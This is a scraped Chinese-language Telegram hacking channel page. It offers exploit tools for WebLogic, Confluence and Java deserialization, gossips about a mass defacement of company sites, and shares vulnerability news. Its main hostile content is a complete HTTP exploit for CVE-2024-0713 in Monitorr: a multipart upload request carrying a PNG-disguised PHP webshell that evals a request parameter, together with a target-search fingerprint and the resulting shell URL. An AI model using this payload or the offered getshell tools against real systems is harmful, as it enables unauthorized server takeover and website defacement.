NEW BOT Телеграм, страница - 114685064

踹哈公寓

4.11K subscribers

589 photos

19 videos

307 files

357 links

一等情事

群 https://news.1rj.ru/str/chuaihagongyu

Download Telegram

About

Blog

Apps

Platform

4.11K subscribers

Channel name was changed to «_3.1.6_linux_amd64»

10:49

qq黑客nday批量神入侵国内企业备案站，修改首页并留下qq，死亡buff叠得最多的一集

我中午看到了就发到tg群了，不知道群里哪edusrc的又扒拉到了教育漏洞报告平台，引了波大流，qq微步微信还有tg都在传
只能说比较符合我对于qq黑客的刻板印象，nday批量无脑梭，梭完不交src要挂个炫酷黑页狠狠装逼再留个qq号，生怕警察叔叔找不到自个。这位多梦琪兄的qq空间更是主打一个自己记录犯罪证据。打批量确实太让容易让人产生自己分外无敌超级黑客的错觉了。只能说你进了局子之后大伙会给你唱一等情事的

😁6👍2

1.94K viewsedited 09:08

🤣5

1.89K views09:45

Atlassian Confluence远程代码执行漏洞（CVE-2023-22527）

👍1

1.73K views12:04

CVE-2017-3506-main.zip

weblogic远程代码执行漏洞一键getshell工具

1.68K views02:20

Java.V1.7 (1).zip

java反序列化综合利用工具

1.66K views02:55

Conflence rce 批量扫描脚本

1.71K views08:02

atlassian-confluence-text-inline-rce.py

1.69K views08:02

审计中很多时候遇到的，为什么我跟进函数和变量都没问题，想post传参调用shell_exec导致rce的时候报了403呢

一般这种情况都是属于后台rce，其他地方给你写个什么if(!isset($_SESSION['isAdmin']) 用个请求头里的参数鉴权，没有登录前台直接post敏感目录就返回403状态码。可以扒拉其他文件找下check User Permission这些字眼，多半就是后台洞，调用本身是没问题的

🤔2

1.8K views10:09

CVE-2024-0713 Monitorr 服务配置 upload.php 无限制上传漏洞

body="assets/php/timestamp.php"

exp:

POST /assets/php/upload.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q

------WebKitFormBoundaryMmx988TUuintqO4Q
Content-Disposition: form-data; name="fileToUpload"; filename="shell.php"
Content-Type: image/png

{{unquote("\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x01\x00\x00\x00\x01\x00\x08\x06\x00\x00\x00\\r\xa8f\x00\x00\x03\x1eIDATx\x9c\xed\xd4\x01\x09\x00A\x10\xc4\xb0Yx\xff\x96\xef\x854\x81Z\xe8m\xef\xdd6I\xbd\xbe\xdd\x80\x28\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x80\xb0\x1f\xbd\xf4\x07\xfa\xeb>\xbe\xab\x00\x00\x00\x00IEND\xaeB`\x82\x0d\x0a<?php class Gn261550 \x7b public function __construct\x28$HW579\x29\x7b @eval\x28\"/*ZWabn8zLCk*/\".$HW579.\"/*ZWabn8zLCk*/\"\x29; \x7d\x7dnew Gn261550\x28$_REQUEST['123']\x29;?>")}}
------WebKitFormBoundaryMmx988TUuintqO4Q--

http://x.x.x.x/assets/data/usrimg/shell.php

👍1

1.65K views01:59

JDumpSpider-1.1-SNAPSHOT-full.jar

HeapDump敏感信息提取工具

❤1

1.68K views02:20

Forwarded from 이수

https://www.blockmedia.co.kr/archives/452873

중국 해커들, 텔레그램으로 범위 확대… 한국인 데이터 유출 순위 4위 – S2W

"한국 인스타그램 계정 데이터 구합니다." 국가 배후 위협그룹을 중심으로 진행되었던 중국발 사이버 위협이 최근 텔레그램을 통해 다양한 형태로 확산하고 있는 것으로 나타났다. 사이버인텔리전스 전문기업인 S2W(에스투더블유)는 ‘중국 텔레그램 데이터 유출 및 위협 동향 분석

1.83K views04:56

gov.cn事件型怎么提供单位证明，进去后台都写了xx市环保局了，非要给我说没有有效的单位证明他给打回了

1.81K viewsedited 07:24

https://mp.weixin.qq.com/s/jXVTr98OGtg-A3JUFhVumw

Weixin Official Accounts Platform

【原创0day】用友YonBIP ServiceDispatcher远程代码执行漏洞

检测业务是否受到此漏洞影响，请联系长亭应急服务团队！

👏1

1.76K views11:47

Forwarded from 鳖频道 (⑨BIE)

jenkins出RCE了
省流：任意文件读读管理员密码解密登录然后后台RCE

这算个勾八RCE你任意文件读就任意文件读为啥要说成RCE

1.65K views04:34

Forwarded from 赛博安全威胁情报🥸

一群黑灰产从业者，二手贩子。
还公安内网确定身份？
前脚打击涉网犯罪专家？后脚就副业勒索了？
#吃瓜

🤩6👏2❤1

1.55K views14:55

https://mp.weixin.qq.com/s/h4toXGlG1s3ADWaWFznUNg

黑客斐济杯，速买

😁10👎4

1.78K views01:16

🍌7🤬2🌭1🍾1

1.83K views11:51